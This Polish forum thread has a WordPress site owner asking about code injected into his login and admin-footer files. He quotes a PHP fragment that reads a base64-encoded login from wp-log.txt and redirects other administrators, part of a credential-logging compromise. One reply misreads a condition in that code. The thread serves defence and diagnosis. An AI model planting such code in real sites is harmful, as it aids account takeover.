Witam,
chciałbym was prosić o radę. Cały czas mam problemy z konkurencją, która próbuje mnie wykończyć na wszystkie możliwe sposoby. Jestem atakowany z różnych serwerów, mam doklejane różne kody do plików itd.

Ostatnio znalazłem takie coś:

wp-login.php

Kod:

function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.value = '';
d.focus();
} catch(e){}
}, 200);
}

wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();

admin-footer.php

Kod:

<?php
global $current_user;
get_currentuserinfo();
$wplog=file('wp-log.txt');
$log=base64_decode(trim($wplog[0]));
if((($current_user->user_level) == 10) and (($current_user->user_login) !== $log) and (count($wplog) !== 6)){
echo '<meta http-equiv="refresh" content="0;url=wp-login.php" >';
}
?>

Czy mógłby mi ktoś powiedzieć za co one odpowiadają te kawałki kodu oraz jak zabezpieczyć się przed takim czymś na przyszłość? Z tego co widzę zapisują one loginy i hasła logujących się osób do pliku wp-log.txt, ale chciałbym wiedzieć co wy o tym sądzicie.

Nie mam już pomysłu jak uwolnić się od tych wszystkich ataków. Może wy coś wymyślicie.

Z góry dziękuje za odpowiedz.

Podstawa to wgranie kilku pluginów typu: WP Block Admin czy Secure WP.

Nie widzę tu nic takiego strasznego.

Pierwszy plik (wp-login.php) to tylko jedna funkcja JS i wywołanie dwóch.
Mówiąć na szybko, odpowiada za to by po pełnym załadowaniu strony - kursor migał w miejscu gdzie trzeba wpisać login.

Drugi plik (admin-footer.php) pobiera informacje o aktualnie zalogowanym użytkowniku, pobiera plik logów, następnie mamy warunek, który sprawdza czy:

1. Poziom użytkownika zalogowanego wynosi 10
2. Użytkownik nie jest zalogowany
3. Ilość wszystkich wpisów w logu nie jest równa 6

Jeżeli powyższe warunki są spełnione, to wyświetla fragment kodu odpowiadający za przekierowanie do strony logowania.

Wojtku tylko w pliku wp-log.txt znalazłem swój login i hasło Jeśli chodzi o stronę logowania to nie występuje ona w PA, więc cały plik został specjalnie wgrany.

W takim razie gdzieś jeszcze musi być fragment kodu, który umieszcza login i hasło w tym pliku.
Podany kod przez Ciebie - nie robi tego.

A to:

catch(e)

lub to:

$wplog=file('wp-log.txt');

Poczytaj sobie o tych funkcjach

Sprawa jest już w zasadzie wyjaśniona, jeśli chodzi o te dodatkowe kawałki kodu: Uważajcie na wtyczki do WordPressa: kto wie, gdzie czai się złośliwy kod? - Webhosting.pl. Portal technologii internetowych

Ten problem został rozwiązany, a wątek zamknięty.

• Jeśli chcesz zadać nowe pytanie, załóż nowy wątek.
• Jeśli masz wątpliwości odnośnie rozwiązanego problemu, poproś moderatora o otworzenie wątku.